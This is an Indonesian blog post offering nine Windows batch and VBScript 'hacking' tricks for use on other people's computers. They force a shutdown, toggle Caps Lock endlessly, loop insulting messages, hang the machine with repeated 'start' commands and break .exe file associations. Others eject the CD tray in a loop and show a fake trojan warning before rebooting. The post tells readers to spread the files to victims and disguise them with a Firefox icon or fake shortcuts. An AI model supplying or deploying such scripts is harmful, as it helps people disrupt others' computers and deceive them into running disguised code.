Kumpulan Trik Hacking Komputer Sederhana Mematikan

RaBiitch Official - Pada Artikel yang anda baca kali ini dengan judul Kumpulan Trik Hacking Komputer Sederhana Mematikan, kami telah mempersiapkan artikel ini dengan baik untuk anda baca dan ambil informasi didalamnya. mudah-mudahan isi postingan Artikel hacking, Artikel trik, yang kami tulis ini dapat anda pahami. baiklah, selamat membaca artikel kami yang berjudul Kumpulan Trik Hacking Komputer Sederhana Mematikan
Kumpulan Trik Hacking Komputer Sederhana Mematikan


Hasil gambar untuk trik hacking sederhana

ANONIMCYBER | Hallo sob seperti judul posting ini kita Langsung saja sob, Sambil ngopi ngopi kek hehe santai sadja.

1. Membuat Forced Shoutdown


Script:
@echo off
msg * I don't like you
shutdown -c "Error! You are too ******!" -s

simpan kode script yang berwarna Merah di Notepad dengan nama : hacking.BAT type file : All file
 sebarkan File tersebut di Komputer teman Anda,
 maka Komputer korban akan otomatis FORCED SHOUTDOWN 

2. Membuat Tombol Caps Lock menyala terus-menerus


Script:
Set wshShell =wscript.CreateObject("WScript.Shell")
 do
 wscript.sleep 100
 wshshell.sendkeys "{CAPSLOCK}"
 loop 

seperti cara yang pertama, hanya berbeda kode script simpan kode yang berwarna biru di Notepad dengan nama : hacking.VBS type File : All File
sebarkan File berikut di Komputer korban maka, Tombol CAPSLOCK akan menyala terus-menerus
(bila dimatikan akan menyala lagi)

3. Membuat Pesan Jail mucul terus


Script: 
@ECHO off
:Begin
msg * muka kamu sangat jelek
msg * ngaca dulu gih, 
msg * hayo lo,cpu lu gw acak acak
msg * udah install ulang aja
msg * biar masalah nya kelar
GOTO BEGIN

simpan kode script yang berwarna hijau dengan nama hacking.BAT type file : All File
Cara ini sangat simple Jail, walaupun di close tab pesan ini masih muncul, kata katanya bisa diubah sesuai selera.
NB: Kamu bisa mengganti tulisan yang setelah tanda * itu dengan sesuka kamu

4.Membuat Komputer Hang dengan Kode script Notepad


Script:

start
start
start
start
start
start
start
start
start
start
start
start

simpan di Notepad dengan nama : hacking.BAT
terus buat shortcut palsu terserah mau shortcut apa, aku saranin shortcutnya browser mozilla terus taro aja di desktop target
( efeknya akan membuka CDM yang banyak banget sampe layarnya keluar keluar )

5.   Cara Merusak Komputer teman(Hacking Jail)


Caranya:

buka cmd(comand prompt), kalo belum tahu nyari dimana , klik start-run-ketik CMD-Lalu ketikan script ini

ASSOC.exe=.hank

lalu enter!!!

Maka program Seperti Ms.word/game-game akan ngambek untuk di jalan kan!

Setelah Puas !
Cara Mengembalikan seperti semula:
buka CMD lagi. lalu ketik 

 ASSOC.exe=EXEFILE

6.Membuat Tombol Caps Lock menyala terus-menerus


Script:
 Set wshShell =wscript.CreateObject("WScript.Shell")
 do
 wscript.sleep 100
 wshshell.sendkeys "{CAPSLOCK}"
 loop
 Simpan script pada Notepad dengan nama : hacking.VBS type File : All File

7.Jail dengan Membuka Tutup CD/DVD room


Script: 
Set oWMP = CreateObject("WMPlayer.OCX.7")
 Set colCDROMs = oWMP.cdromCollection
 do
 if colCDROMs.Count >= 1 then
 For i = 0 to colCDROMs.Count - 1
 colCDROMs.Item(i).Eject
 Next
 For i = 0 to colCDROMs.Count - 1
 colCDROMs.Item(i).Eject
 Next
 End If
 wscript.sleep 5000
 loop

Simpan script NOTEPAD tadi dengan nama : hacking.vbs type file : All

8.Cara Membuat Pesan ' Komputer Anda Butut Sekali'


Script :
Set wshShell = wscript.CreateObject("WScript.Shell")
 do
 wscript.sleep 100
 wshshell.sendkeys "Komputer Anda Butut Sekali"
 loop

simpan script dengan nama : hacking.vbs Ttpe file:All files

9.Hacking paling jahat dan membuat jangtung DEBUAR-DEBUAR


Script: 
@echo off
msg * Perkenal kan, saya adalah trojan virus!!!!! Setelah 1 menit Komputer anda akan error dan harus di re-instal !!!! TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX!
PAUSE
shutdown -r -t 300 -c ” SORRY!!! YOUR Computer is being #ERROR GOD BYE ………..”

simpan script dengan nama(terserah anda) .
contoh:
 Nama: Mozila.bat
Type file : All files
 Setelah itu, ganti icon nya sesuai dengan icon mozila firefox untuk mengelabui si korban 

Selamat mencoba.

source: http://ganiazmedia.blogspot.co.id/


Demikian penjelasan mengenai Kumpulan Trik Hacking Komputer Sederhana Mematikan dan seperti biasa silahkan tinggalkan apa pendapat kalian di kolom komentar mengenai Kumpulan Trik Hacking Komputer Sederhana Mematikan

Bagikan : https://www.rabiitch.me/2017/12/kumpulan-trik-hacking-komputer.html

0 Response to "Kumpulan Trik Hacking Komputer Sederhana Mematikan"

Post a Comment

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel